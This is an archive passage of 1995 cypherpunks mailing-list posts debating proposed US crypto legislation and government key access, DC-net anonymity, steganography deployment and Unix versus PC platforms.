official has acceded into excruciatingly detailed and usually 
confusing legislative language.

There's a relatively small number of really activist people in government, 
and not all of them are public and visible.  It's possible that some 
congresscritters could be defeated with the aid of dissemination back home of 
information on the non-voter issues they've championed and concise 
explanations of how many of those issues work to harm their voters.  It's 
also possible that some of those faceless staffers could be turned into 
liabilities by focusing some light on them, thereby reducing their 
effectiveness and employability.

>This is not to say that we shouldn't be widely deploying crypto -- we
>should. (Of course, offshore sites will always have crypto available,
>but...) 

It would seem that the U.S. may lose a number of good minds who may prefer to 
live and write code in other parts of the world.  This has been a developing 
trend for other reasons, and now people who like to write crypto will have 
another reason to look for a new home.

>This is also not to say that Congress doesn't pass very bad laws.

Name a good one!

>However, I very, very strongly urge that we not assume that nothing
>can be done. Just winning a couple years time could totally alter the
>landscape.

Your urging is appropriate.  It's odd, though, how the country seems to be 
pulling itself in two diametrically opposed directions:  On the one hand the 
electorate shifted significantly in the '94 election, responding with greater 
enthusiasm than even the new young Turks in Congress seem to fully 
comprehend, and seeming to be fed up with too much government, prepared to 
commission the dismantling of federal bureaucracy and getting government the 
hell out of their lives.  On the other hand we see bold and impressive moves 
on the part of politicos and bureaucrats toward a suffocating, draconian 1984 
police state.  We have even heard increasing choruses of "Just following 
orders" and "Just doing my job" from mindless hatchetmen these last few 
decades -- bizarre and incredible echos of the excuses offered in post-WWII 
war crimes defenses.

The country cannot move strongly in these two directions for long: Something 
has to give.  The longer this division persists, the greater the gulf that 
stretches between and the more "interesting" the times that will result when 
one side prevails.  The side that prevails will consume the side that fails 
with an intensity related to the energy built up in the process.

Crypto is presently on the periphery of the larger schism, though it's 
conceivable that twenty years in the future it would be clearly understood by 
most people to be central to privacy in an information age.  The moves to 
head crypto, and thus privacy, off at the pass are being made now, though, in 
an effort to prevent a future in which large numbers of people understand how 
to maintain privacy when everything is a bit stream. 

If there is a critical and unique difference between this and other 
seemingly similar situations it is the 10-15% monthly growth of the Internet, 
something that is orders of magnitude greater than what humans are accustomed 
to perceiving, estimating, handling, coping with.  If recent figures are 
accurate, 7,500+ new web pages have been created in the 33 hours since this 
thread started here and perhaps 100,000 new people are on the net in one way 
or another.  It's unlikely that Grassley or Exon or Leahy can assimilate all 
the implications of that rate of growth.  "Senator, the blob is at the door!" 
 "Well, call the State Police!"  "Uh, sir, they're at least three hours away. 
 In that time the blob will be larger than the State of Idaho!"  

The politicos have never before dealt with a sizable "throwaway minority" 
whose current growth curve intersects the U.S. population curve in 24 months 
and the world population curve in 4 years.  In a couple of days there are 
more new people getting on the net worldwide than are contained in a U.S. 
congressional district.  Partly as a result, there are issues getting 
attention that would have easily been contained just a couple of years ago by 
the policy of benignly overlooking them.  No longer.  If a net mobilization 
was disappointing last month, try it this month and see the difference.  
Movements that took years to form and grow decades ago take days or weeks 
now.  Soon they will take only hours.  

We are just now cresting the big one on the supercharged roller coaster of 
high tech infoplosion, and as the velocity rapidly builds there will be 
profound shock among the old and the slow.  Even the savvy will be surprised. 
Push this medium for all it's worth.  Find ways to promote informed privacy 
as a ground-floor issue for newbies and get them to have a knowledgable, 
vested interest in it.  Get people onto the net.  One new person today is 
four or five people a year from now, 15-28 people two years from now.  Since 
a lot of it spreads from person to person, new people start with tools and 
concepts they get from others, so the initiation of a new netparticipant as a 
privacy-aware crypto user tends to spawn subtrees of new users in the same 
mode.  Use the growth multiplier to outflank 'em while they're noodling.

Would it be more productive to hire the white shoes or start another few ISPs 
and shepherd the new users to be privacy-aware letter writers and faxers?  
Educate your ISPs.  Any ISP that isn't political in this age is brain 
dead and dead weight.  Any ISP that sees its political interests as somehow 
different than those of its users (recent lobbying to shift burdens away 
from national services and onto users, and recent AOL admissions of 
participation in what sounded like entrapping users) is worse than brain dead 
-- it's part of the problem.

Bolivar








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@ugcs.caltech.edu ((me))
Date: Sat, 15 Jul 95 03:06:50 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131855.AA04443@cs.umass.edu>
Message-ID: <199507151006.DAA28022@beat.ugcs.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


In mlist.cypherpunks you write:

>GAK: it's not just a bad idea, it may soon be the law !
Help!   What does GAK stand for?  I've seen it a billion times,
but I missed the original explanation.

It sounds like some sort of key/crypto registration.

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 15 Jul 95 05:18:55 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507151006.DAA28022@beat.ugcs.caltech.edu>
Message-ID: <199507151218.FAA00476@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> silly@ugcs.caltech.edu ((me)) writes:
> Help!   What does GAK stand for?  I've seen it a billion times,

Government Access to Keys; also seen as GACK (Crypto Keys).  This is more
descriptive and accurate than calling it Key Escrow, since escrow is for
the benefit of the parties involved in a transaction.  I think it's Carl
Ellison's invention, and most apt it is.

	Jim Gillogly
	22 Afterlithe S.R. 1995, 12:16




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 15 Jul 95 05:41:46 PDT
To: Jim Gillogly <jim@acm.org>
Subject: MANDATORY KEY REGISTRATION
In-Reply-To: <199507151218.FAA00476@mycroft.rand.org>
Message-ID: <Pine.SUN.3.91.950715053310.8362B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 15 Jul 1995, Jim Gillogly wrote:

> Government Access to Keys; also seen as GACK (Crypto Keys).  This is more
> descriptive and accurate than calling it Key Escrow, since escrow is for
> the benefit of the parties involved in a transaction.  

I favor the term, "Mandatory Key Registration."  It is even more 
accurate, and parallels gun registration.  This should strike a
sympathetic chord with our pro-2nd Amendment friends.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 05:38:41 PDT
To: cypherpunks@toad.com
Subject: Receiver anonymity in DC-nets...
Message-ID: <199507151234.AA14413@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



A method occured to me that obviates the need for public-key cryptography
as a method of receiver anonymity in a dining-cryptographer network.

I'm *sure* someone has thought of this before. I don't, however, have
access to netscape or mosaic just now to search the archive with.

If this topic or method has come up before (if you know of it, you'll
know what I'm talking about; if not, and noone has come up with it before,
which I doubt, I'd still like the patent ;-) and one of you guys has the
relevant messages handy could you send them to me? Don't go through any
great trouble, you understand...

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 15 Jul 95 07:01:45 PDT
To: cypherpunks@toad.com
Subject: POX_usg
Message-ID: <199507151401.KAA14738@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-15-95. NYPaper Page Oners:

   
   "Director of F.B.I. Demotes Deputy: No. 2 Man's Ouster Is
   Tied to Inquiry on Idaho Siege."

      F.B.I. Director Louis J. Freeh today demoted the
      bureau's Deputy Director, Larry A. Potts, citing the
      turmoil created by an internal investigation into the
      destruction of documents relating to the conduct of Mr.
      Potts and other senior F.B.I. officials in a deadly 1992
      standoff with a white separatist in Idaho.     SAV_ass


   "B-2, After 14 Years, Is Still Failing Basic Tests."

      The $44 billion B-2 bomber has radar that cannot
      distinguish a raincloud from a mountainside, has not
      passed most of its basic tests and may not be nearly as
      stealthy as advertised, according to a draft report by
      the General Accounting Office. It was provided to The
      New York Times by a Government official skeptical of the
      bomber's capabilities who sought to bring into the
      debate the report's examples of the B-2's inability to
      pass performance hurdles.                      YB2_gud



   2n1: POX_usg











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 08:06:42 PDT
To: cypherpunks@toad.com
Subject: Mods to Dining Cryptographers: legal questions...
Message-ID: <199507151502.AA25734@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm sorry if I was a little mysterious about my reference to
another use or mode of a DC-net; I'd _love_ to tell the rest of
you flat-out, and put the idea in the public domain, but I'm
not sure I _CAN_.

(All of this is only relevant, however, if noone else has thought of
it first; I think this is unlikely at the moment, as it would mandate
a large rewriting of the section on DC-nets in the cyphernomicon. On
the other hand, I'm kinda suprised that noone else has thought of
this.)

Anyway, I just have this awful feeling that if I post this, there's
going to be a stupid patent application filed by someone like Jim
Bidzos claiming this and I won't be able to do anything about it.
(Please note I mean the people _like_ Jim Bidzos and not Jim Bidzos
himself; he's merely an example of someone who has a lot of capital to
spend on software patents. I don't, and don't mean to say that _he_
goes around stealing ideas from other people and patenting them.)

How do I do this and protect myself from the people who do have the
money to go through the intellectual property courthouse game?

Should I just dump this in the public domain? 

Perhaps show it to a trusted individual (or two) on this list to look
at and see whether it is worth further development (perhaps not?)?

Are there any patents on Dining-Cryptographers networks that could
interfere with the placing in the public domain, or the patenting, of
an improvement to the network system?

I need help.

Phil

+----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+
| Phil Fraering / \"The English Hierarchy, if there be anything unsound in|
| pgf@tyrell.net\ /its constitution, has reason to tremble even at an air |
+----------------+-pump or an electrical machine."---Joseph Priestly------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 08:54:53 PDT
To: cypherpunks@toad.com
Subject: Deployment
In-Reply-To: <9507151505.AA23237@anon.penet.fi>
Message-ID: <199507151550.AA29983@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



   >In addition, now is the time to deploy stego, on a massive scale.  
   >How many stego programs have been released for Unix?

   Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus

The masses aren't responsible for the net either; the unix people
generally _are_. AFTER the tools are written for Unix, the stuff
can undoubtedly be ported down to the mainstream OS's. I hear
they're improving.

   with nifty Unix crypto utilities that PC users can only wonder about
   need to buy PC's and start porting now if you want to get anywhere.

   Unix?  Hah!  Gimme a break!  Unix is a Warsaw ghetto.

Unix is a Warsaw ghetto that can be run on almost any current PC,
including many that have problems with Windows '95. And it's more
capable.

You think the penet remailer you just used is running in Windows?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Sat, 15 Jul 95 08:10:33 PDT
To: cypherpunks@toad.com
Subject: Re: MISC> Current US National Security Directives published
In-Reply-To: <3tuelf$6e3@westie.mid.net>
Message-ID: <kVca9c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: voxbox!hypnos!ragnarok.oar.net!malgudi.oar.net!kira.cc.uakron.edu!neoucom.edu!news.ysu.edu!news.ecn.uoknor.edu!bubba.ucc.okstate.edu!news.ksu.ksu.edu!news.mid.net!news.mid.net!not-for-mail
From: Gleason Sackman <sackman@plains.nodak.edu>
Newsgroups: comp.internet.net-happenings
Subject: MISC> Current US National Security Directives published
Message-ID: <3tuelf$6e3@westie.mid.net>
Date: 11 Jul 1995 13:07:43 -0500
Sender: infoserv@news.mid.net
Organization: MIDnet, the Midwest's Gateway to the Global Internet.
Lines: 96
Approved: ralphie
NNTP-Posting-Host: westie.mid.net

*** From Net-Happenings Moderator ***

Date: Mon, 26 Jun 1995 18:15:21 -0500
From: SIMPSON@AUVM.AMERICAN.EDU
Subject: Current US National Security Directives published

CURRENT U.S. NATIONAL SECURITY DIRECTIVES PUBLISHED

This announcement is likely to be of particular interest to
librarians, historians, and journalists specializing in government
documents, international affairs, military affairs and military
history, nuclear policy, outer space, and US trade and technology
policy.....

Thank you for letting me share this with you.
			-- Christopher Simpson


I've compiled an unusually complete collection of presidential
National Security Decision Directives from the administrations of
Ronald Reagan and George Bush (1981-1993). The collection is similar
in certain respects to the well known _Foreign Relations of the
United States_ (FRUS) series, but is far more current. The
declassified texts of more than 250 NSDD's are included; each text
has an introduction describing its origin and context; and there is
an extensive cross-index and subject index. The collection goes
considerably beyond the NSDDs available at the US National Archives
or in any other collection, because it includes verbatim texts of
directives that have been leaked  in whole or in part by the
administration, but not formally declassified. It also includes
tables of organization of the National Security Council. The new
collection's format also makes it much less expensive, and easier to
use, catalog and store than any comparable microform or hard copy
collection.

Major areas of coverage include:

++ management of US national security policy, covert operations,
weapons procurement, arms control negotiations, and anti-terrorism
policies;

++ US relations with Israel, Europe, USSR, China, Australia,
Nicaragua, Mexico, Central America, East Africa, Japan, Germany,
Southeast Asia, Micronesia, Libya, Egypt, Iran, Iraq, the
Philippines, Yugoslavia, South Africa and Namibia, etc., etc.

++ nuclear weapons procurement and testing, nuclear arms control;
internal debates over SALT, ABM, START, SDI and related matters;
civil defense and FEMA;

++ Space policy, privatization of space assets, NASA-DOD conflicts,
space and aerospace procurement;

++ Trade policy with Japan, G-7 summits, technology transfer,
export controls, economic warfare, subsidies for strategic US
industries;

++ Telecommunications and computer policy, including technology
security policies;

++ drugs and US foreign policy;

++ the Iran-Contra affair and its aftermath;

++ internal security and emergency continuity of government policies;

++ war with Iraq;

and much more.


For further information:

_National Security Directives of the Reagan and Bush
Administrations; The Declassified History of US Political and
Military Policy 1981-1991,_ by Christopher Simpson. 1032 pages.

Westview Press, 1995  isbn: 0-8133-1177-2   list: $119.95

telephone: 303-444-3541     fax: 303-449-3356


"... absolutely indispensable for studying U.S. national security
policies during the Reagan and Bush administrations."
			Melvyn Leffler,
			President, Society for Historians of
			American Foreign Relations

"... painstaking and expert analysis... an important benchmark"
			Charles Tiefer,
			Deputy General Council and Solicitor,
			US House of Representatives


=====================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Sat, 15 Jul 95 14:37:59 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <2426@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <9507150128.AA16854@toad.com> "Brian A. LaMacchia" writes:
[...] 

I agree that as drafted any GAK'ed crypto satisfies the 
affirmative defense under Grassley's s. 1030(a).

> 
> The proposed 1030A(c) provides a defense to prosecution under 1030A(a).
> So if GAKed crypto satisfies 1030A(c) then it can be deployed without
> fear of prosecution under 1030A(a).  It might still violate ITAR, of
> course, although I suspect any system that satisfies 1030A(c) would be
> granted a CJ.

AFAIK, neither Clipper nor Capstone have actually gotten export 
clearance yet.  No demand?  Fact that there were at last count 
no more than two beta versions of the decrypt processor in 
existence?  Or is my info just out of date....

[...]
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@shadow.net (Joe Block)
Date: Sat, 15 Jul 95 10:07:41 PDT
To: jim@acm.org
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01520c00ac2d6ccb7194@[198.79.48.47]>
MIME-Version: 1.0
Content-Type: text/plain


>> silly@ugcs.caltech.edu ((me)) writes:
>> Help!   What does GAK stand for?  I've seen it a billion times,
>
>Government Access to Keys; also seen as GACK (Crypto Keys).  This is more
>descriptive and accurate than calling it Key Escrow, since escrow is for
>the benefit of the parties involved in a transaction.  I think it's Carl
>Ellison's invention, and most apt it is.

I like Federal Usurpation of Citizens Keys for Encrypted Discourse, myself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Sat, 15 Jul 95 10:30:43 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507151728.AA15916@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 14 Jul 95 21:28:27 -0400
>From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
>Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
>
>   >       `(c) It shall be an affirmative defense to prosecution under this
>   >     section that the software at issue used a universal decoding device
>   >     or program that was provided to the Department of Justice prior to
>   >     the distribution.'.
>
>   This isn't escrowed encryption being allowed here.  This is straight giving
>   of keys (or a back door) to the gov't.  Even Clipper fails this test.
>
>Why doesn't GAK satisfy this clause?

[...]  

>
>I don't see how Clipper fails the 1030A(c) test, except possibly for the
>fact that the proposed escrow agents were not both within DOJ.  I think
>that's a minor point.

Sorry.  That's the minor point I was talking about.

For example, one might make an exportable system by doing something really
nice for the gov't and giving NSA a back door master key for it to use.
That doesn't give it to the DoJ -- and I'm not so sure NSA would admit to
the existence of a back door much less release the master key.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Sat, 15 Jul 95 12:21:12 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Deployment
Message-ID: <Chameleon.4.01.2.950715141932.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


I had thought to respond similarly when I first saw this unixcentric 
statement:

>On Sat, 15 Jul 1995 an250888@anon.penet.fi wrote:
>
>> >In addition, now is the time to deploy stego, on a massive scale.  
>> >How many stego programs have been released for Unix?
>> 
>> Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
>> with nifty Unix crypto utilities that PC users can only wonder about
>> need to buy PC's and start porting now if you want to get anywhere.

I have to take issue with this, though:

>A legitimate point; however, the majority of PC users won't be in the 
>vanguard of /anything/ -- it's not the nature of the PC industry.  If all 
>the Unix folks do it, then the PC folks might.

The point *is* legitimate.  I disagree that PC users won't be in the vanguard 
of anything:  PC users *are* the market now (gag me with a TSR).  A nifty 
program for PC will be in use by millions in a *very* short time, while a 
similar program for unix will not even be visible to the larger market.  If 
PGP had been limited to the unix market, few people would know of it today.  
Frankly, the PC folks don't give a rat's ass what unix folks do.  Watch the 
production and sales numbers for Windows 95 and gasp.  For better or worse, 
that is the market, and that is where the bucks are to pay for connectivity, 
memory, disk, and... software.

>Besides, the first was the point I was making; the second, I was 
>personally interested, because, after all, I run unix.

I certainly don't want to bash unix, but I can't help but think that one's 
viewpoint of what's going on "out there" is strongly affected by the 
encapsulated universes we create for ourselves.  If you like to run unix but 
hooked into it from another PC running TCP/IP under Windows, you'd see what 
the vast majority of new users see -- no command line, no need to deal with a 
30 year old user interface (send flames to useless.arguments@blackhole.net). 

>In addition, many of the PC people who do Internet communications do it 
>through a unix server anyway.  So it would be beneficial.

Does that matter much?  ISPs are proliferating like mushrooms, and the users 
hooking up to them have PCs and Macs.  Users connect by PPP or SLIP and use 
mail and www clients.  The user interface therefore has nothing to do with 
the connectivity or host OS.  Most of them *never* telnet, and only some of 
them ftp to install web pages.  

Also, more and more people who connect to internet go *through* no ISP server 
at all.  A modem controller at the ISP prompts for userid and password, then 
connects them to an interface that takes them to a router.  Their packets 
flit over to the name server or out on the T1 as required, their traffic 
untouched by unix or any other OS.  An ISDN connection comes in on the same 
T1 that will carry most of its packets back out to the world, with a 
connection manager and router being the closest things to computers involved 
in the process.  At the far end of the net a server running who-cares-which-
OS handles the client's traffic and responds to it by standards that are 
thoroughly OS-independent.

I respectfully submit that improvements of user interface and tinker toy 
integration and development of new tools must be aimed at Windows / OS/2 / 
Mac System to have major impact, and at unix as a convenience to the 
important academic and other communities that work more directly with the 
unix user interfaces.  Academic and scientific users may make the bulk of 
thoughtful contribution in many areas, but that's like server push -- if 
there's no client, nothing happens.


--Bolivar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 15 Jul 95 11:03:56 PDT
To: an250888@anon.penet.fi
Subject: Re: Deployment
In-Reply-To: <9507151505.AA23237@anon.penet.fi>
Message-ID: <Pine.SUN.3.91.950715135653.2964B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jul 1995 an250888@anon.penet.fi wrote:

> >In addition, now is the time to deploy stego, on a massive scale.  
> >How many stego programs have been released for Unix?
> 
> Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
> with nifty Unix crypto utilities that PC users can only wonder about
> need to buy PC's and start porting now if you want to get anywhere.

A legitimate point; however, the majority of PC users won't be in the 
vanguard of /anything/ -- it's not the nature of the PC industry.  If all 
the Unix folks do it, then the PC folks might.

Besides, the first was the point I was making; the second, I was 
personally interested, because, after all, I run unix.

In addition, many of the PC people who do Internet communications do it 
through a unix server anyway.  So it would be beneficial.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Sun, 16 Jul 95 13:27:18 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Unix not the Only Place for "Vanguard" Applications
In-Reply-To: <199507152320.AA05094@tyrell.net>
Message-ID: <Pine.LNX.3.91.950715141132.1604B-100000@nesta.pr>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jul 1995, Phil Fraering wrote:

>    Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of
>    the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even
>    recollect who was who in this battle). Maybe it was the News vs. X vs.
>    OpenLook vs. NeXTStep vs. etc. user interface battles.
> 
> Well, it looks like there will be a major Unix mainstream again
> with two branches capable of more-or-less running each other's
> binaries without too much pain: FreeBSD and Linux.
>
My sentiments in a way, you'll see some higher end PC users moving to 
this, plus the usual gammut of teenage hackers, like I was.
 
>    In any case, I expect Windows (and Windows NT) will take an ever-increasing
>    share of the market for at least the next several years. I'm hardly alone
>    in this expectation.
> 
> BTW, I hear Linux can now run Windows 3.1 in its DOS box.
> 
not completely, it can load it and some apps if you run it like you used 
to have to on a 286.  WINE is far from complete.  The thing is some major 
software compnies are actually taking initiative and making lInux native 
apps, like Wordperfect is coming out in Fall, and Matlab and Mathematica 
are either here already, or will be here in a month or so.  Alot fo 
commercial databases are coming to Linux too.

BUT, please PLEASE, let's not let this turn into a advocacy war, I hang 
out on those groups myself and get enough of them there, don't need it 
here.  I think we're all intelligent enough to realize that both platform 
bases have advantages and disadvantages.  I personally get a woody form 
anything that flips bits so I'm not about to argue.


"I regret that I have but six orifices to give you" -Nesta Stubbs
/-/ a s t e  http://www.mcs.net/~nesta/home.html Angeli Caduti Assasin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Sat, 15 Jul 95 08:27:13 PDT
To: cypherpunks@toad.com
Subject: Deployment
Message-ID: <9507151505.AA23237@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>In addition, now is the time to deploy stego, on a massive scale.  
>How many stego programs have been released for Unix?

Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
with nifty Unix crypto utilities that PC users can only wonder about
need to buy PC's and start porting now if you want to get anywhere.

Unix?  Hah!  Gimme a break!  Unix is a Warsaw ghetto.


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Sat, 15 Jul 95 08:28:12 PDT
To: cypherpunks@toad.com
Subject: Off Your But and Learn! ;*)
Message-ID: <9507151505.AA23302@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>I am not a programmer either, but I am being motivated to become one. 
>If only there was more time.

Neither am I, but may I suggest the following:

S. Prata, C++ Primer Plus: Teach Yourself Object-Oriented Programming,
2d ed., Waite Group Press, ISBN 1-878739-74-3 (1995).  Nuts & bolts.

S. Lippman, C++ Primer, 2d ed., Addison-Wesley, ISBN 0-201-54848-8
(1993).  Not quite so nuts and bolts, but good to read after covering
the treatment of the same material in Prata.

I've just starting working through these and find them effective.


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sat, 15 Jul 95 16:04:03 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Unix not the Only Place for "Vanguard" Applications
Message-ID: <ac2d93b913021004f19f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:59 PM 7/15/95, Jon Lasser wrote:
>On Sat, 15 Jul 1995 an250888@anon.penet.fi wrote:
>
>> >In addition, now is the time to deploy stego, on a massive scale.
>> >How many stego programs have been released for Unix?
>>
>> Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
>> with nifty Unix crypto utilities that PC users can only wonder about
>> need to buy PC's and start porting now if you want to get anywhere.
>
>A legitimate point; however, the majority of PC users won't be in the
>vanguard of /anything/ -- it's not the nature of the PC industry.  If all
>the Unix folks do it, then the PC folks might.

I disagree with this, depending on what one's interpretation of "vanguard"
is, and for what products.

For example, I've been a Macintosh user since 1986, despite having worked
for Intel for 12 years prior to that. (Actually, I'm a fan of the Mac OS
and Way of Doing Things and don't care whether the main microprocessor is
Motorola, Intel, or Phlogistonics.)

For many years the most interesting--to me--applications came first on the
Macintosh, then on the PC, and then only occasionally to Unix machines.
Apps like PageMaker, Adobe Photoshop, Illustrator, Fractal Design Painter,
Eudora, MORE, and so forth. Things have changed recently, with Windows
getting the desirable apps a bit earlier than the Mac version. (The Mac
versions of the products above came first becuase of the obvious graphics
and user interface consistencies of the Mac, and the user community in
prepublication, journalism, and art environments. Writing for DOS in those
days was a real lose, because of the lack of a consistent set of standards
and toolbox calls...)

Only one program I use a lot came first on Unix boxes: FrameMaker. And
FrameMaker hit the Mac a few quarters after first appearing on Unix boxes,
around 1988 or so.

I'm not dismissing Unix boxes or Unix tools...they are obviously very
useful for running the Internet and the various tools that access it.
Enough said. (And SGI and Sun are doing pretty well. The "vanguard apps"
that run on these machines, including the well-known imaging apps, are not
things I use.)

But I think the point that PCs (and by extension, Macintoshes, which are a
flavor of PCs) are never in the vanguard is wrong. By my interpretation of
vanguard. (I expect a quibble, this being the Cypherpunks list, about
whether Jon meant "the majority of PC users won't be in the  vanguard of
/anything/ -- it's not the nature of the PC industry" to mean this...)

Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of
the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even
recollect who was who in this battle). Maybe it was the News vs. X vs.
OpenLook vs. NeXTStep vs. etc. user interface battles.

In any case, I expect Windows (and Windows NT) will take an ever-increasing
share of the market for at least the next several years. I'm hardly alone
in this expectation.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 15 Jul 95 07:18:36 PDT
To: cypherpunks@toad.com
Subject: Re: def'n of "computer network"
Message-ID: <v01510103ac2ca05c8eb2@[193.74.217.19]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>rick hoselton writes:
>> Perry, I don't understand.  If the least significant bits in my gif file
>> follow all the "known statistical distributions", how can anyone know
>> whether they are "just noise" or are an encrypted message,

If your attacker has a more sophisticated statistical model of noise
distributions than you do, then he can deduce the existence of message.

>
>Indeed -- how could the recipient even know to look, unless these
>things arrived regularly and with a fully standardized form of
>stegonography, in which case why bother, all you've done is come up
>with a very odd form of transfer encoding.
>
>If the recipient does know to look, that implies either that there is
>a hint, in which case the stegonography is useless, or it implies that
>you have prearrangement, in which case my comments on prearrangement
>hold.

Well, there's things like the subliminal channel in DSS (discussed in Applied
Cryptography) whereby a DSS chip could leak bits of a user's private key.  In
the channel discussed, even if the user suspected the existence of the
channel, there's no way he can prove it.  Now, that's steganography!

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMAfXAI4k1+54BopBAQHF4AQA2jRHvyKQ0ojYj7GHWpmZ+hz84dsXDtUS
NJHqxjjIK1RtvPFAm4QI8p3lt/ovGKLH+CjpC0QuHZ0B3O3INkz/zD7IwsU+1SJA
QycBquLvh7Q/dPkZ6J6P87Bmy0gzNBJrvW7rxLuOQyu9EOUtixFS2H9lDNa8zISp
xZ/4yrb1/ZE=
=NKwt
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
